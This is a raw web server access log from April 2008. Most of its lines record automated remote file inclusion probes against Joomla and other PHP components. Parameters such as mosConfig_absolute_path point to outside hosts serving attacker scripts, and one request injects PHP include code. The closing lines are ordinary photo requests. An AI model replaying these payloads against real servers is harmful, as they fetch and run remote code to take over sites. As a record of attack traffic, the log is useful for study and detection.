216.193.201.57 - - [29/Apr/2008:09:30:33 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:30:42 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.6.34 - - [29/Apr/2008:09:30:59 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [29/Apr/2008:09:31:00 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [29/Apr/2008:09:31:02 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:09:31:06 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:09:31:18 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.los-chamos.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:09:31:18 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://forum.radiojohn.nl/auction/images/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:31:32 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:31:32 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:31:33 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [29/Apr/2008:09:31:47 -0700] "GET /logs//////////?mosConfig_absolute_path=http://computasiunair.com/paddy/test.txt?? HTTP/1.1" 200 45281 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
210.113.203.55 - - [29/Apr/2008:09:31:50 -0700] "GET //////////?mosConfig_absolute_path=http://computasiunair.com/paddy/test.txt?? HTTP/1.1" 200 11606 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:32:06 -0700] "GET /logs/access_080122.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:32:07 -0700] "GET /logs/access_080122.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.1.143 - - [29/Apr/2008:09:32:09 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.studio-wave.com/tsu/styel.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:32:09 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.1.143 - - [29/Apr/2008:09:32:10 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.studio-wave.com/tsu/styel.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.1.143 - - [29/Apr/2008:09:32:10 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.studio-wave.com/tsu/styel.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:32:10 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.79" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:32:12 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:32:13 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [29/Apr/2008:09:32:16 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:09:32:19 -0700] "GET /logs/access_080321.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:09:32:20 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:09:32:20 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:09:32:24 -0700] "GET /logs/home.php?content=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:09:32:26 -0700] "GET /home.php?content=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:32:31 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:32:34 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:32:35 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:32:36 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.79" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:32:38 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:32:39 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.805" "www.dmulk.com"
64.191.81.165 - - [29/Apr/2008:09:32:44 -0700] "GET /logs/access.log///components/com_performs/performs.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.191.81.165 - - [29/Apr/2008:09:32:44 -0700] "GET ///components/com_performs/performs.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.191.81.165 - - [29/Apr/2008:09:32:44 -0700] "GET /logs///components/com_performs/performs.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.17.1.143 - - [29/Apr/2008:09:32:56 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.studio-wave.com/tsu/styel.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:32:56 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:32:59 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:33:00 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:33:22 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:33:22 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.1.143 - - [29/Apr/2008:09:33:24 -0700] "GET /logs/access_080329.log//atom.php5?page=http://www.studio-wave.com/tsu/styel.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.1.143 - - [29/Apr/2008:09:33:25 -0700] "GET //atom.php5?page=http://www.studio-wave.com/tsu/styel.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.1.143 - - [29/Apr/2008:09:33:25 -0700] "GET /logs//atom.php5?page=http://www.studio-wave.com/tsu/styel.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:33:26 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:33:27 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.124 - - [29/Apr/2008:09:33:42 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.179.247 - - [29/Apr/2008:09:33:42 -0700] "GET /logs/access_080308.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.17.1.143 - - [29/Apr/2008:09:33:43 -0700] "GET /logs/access_080324.log//atom.php5?page=http://www.studio-wave.com/tsu/styel.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.193.237.22 - - [29/Apr/2008:09:33:59 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.237.22 - - [29/Apr/2008:09:33:59 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.237.22 - - [29/Apr/2008:09:34:00 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.60.30.251 - - [29/Apr/2008:09:34:18 -0700] "GET /logs/access_080329.log//ashnews.php?pathtoashnews=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.60.30.251 - - [29/Apr/2008:09:34:18 -0700] "GET //ashnews.php?pathtoashnews=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.60.30.251 - - [29/Apr/2008:09:34:18 -0700] "GET /logs//ashnews.php?pathtoashnews=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:09:34:24 -0700] "GET /logs/access_080101.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
84.19.182.247 - - [29/Apr/2008:09:34:26 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
84.19.182.247 - - [29/Apr/2008:09:34:31 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
64.60.30.251 - - [29/Apr/2008:09:34:37 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:09:34:52 -0700] "GET /logs/forum.php?act=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:09:34:52 -0700] "GET /forum.php?act=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.193.237.22 - - [29/Apr/2008:09:35:14 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:09:35:28 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:09:35:33 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:09:35:34 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.191.81.165 - - [29/Apr/2008:09:35:45 -0700] "GET /logs/access_080223.log///components/com_performs/performs.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.9.129.6 - - [29/Apr/2008:09:35:45 -0700] "GET /logs/access_080117.log/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://bvaclub.free.fr//administrator/components/idN.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.129.6 - - [29/Apr/2008:09:36:14 -0700] "GET /logs/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://bvaclub.free.fr//administrator/components/idN.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.129.6 - - [29/Apr/2008:09:36:14 -0700] "GET /sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://bvaclub.free.fr//administrator/components/idN.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:09:37:11 -0700] "GET /logs/access_080219.log//agendax/addevent.inc.php?agendax_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:09:37:21 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:09:37:22 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:09:37:22 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.191.81.165 - - [29/Apr/2008:09:37:39 -0700] "GET ///components/com_performs/performs.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:45 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:45 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:47 -0700] "GET /bikes/dteel/2008_02_23/IMG_4573s.JPG HTTP/1.1" 200 240669 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:47 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:47 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:49 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:50 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:50 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:51 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:52 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:52 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:54 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:54 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:54 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:56 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:56 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:57 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:58 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:58 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:58 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:59 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:37:59 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:38:00 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:38:01 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:38:01 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
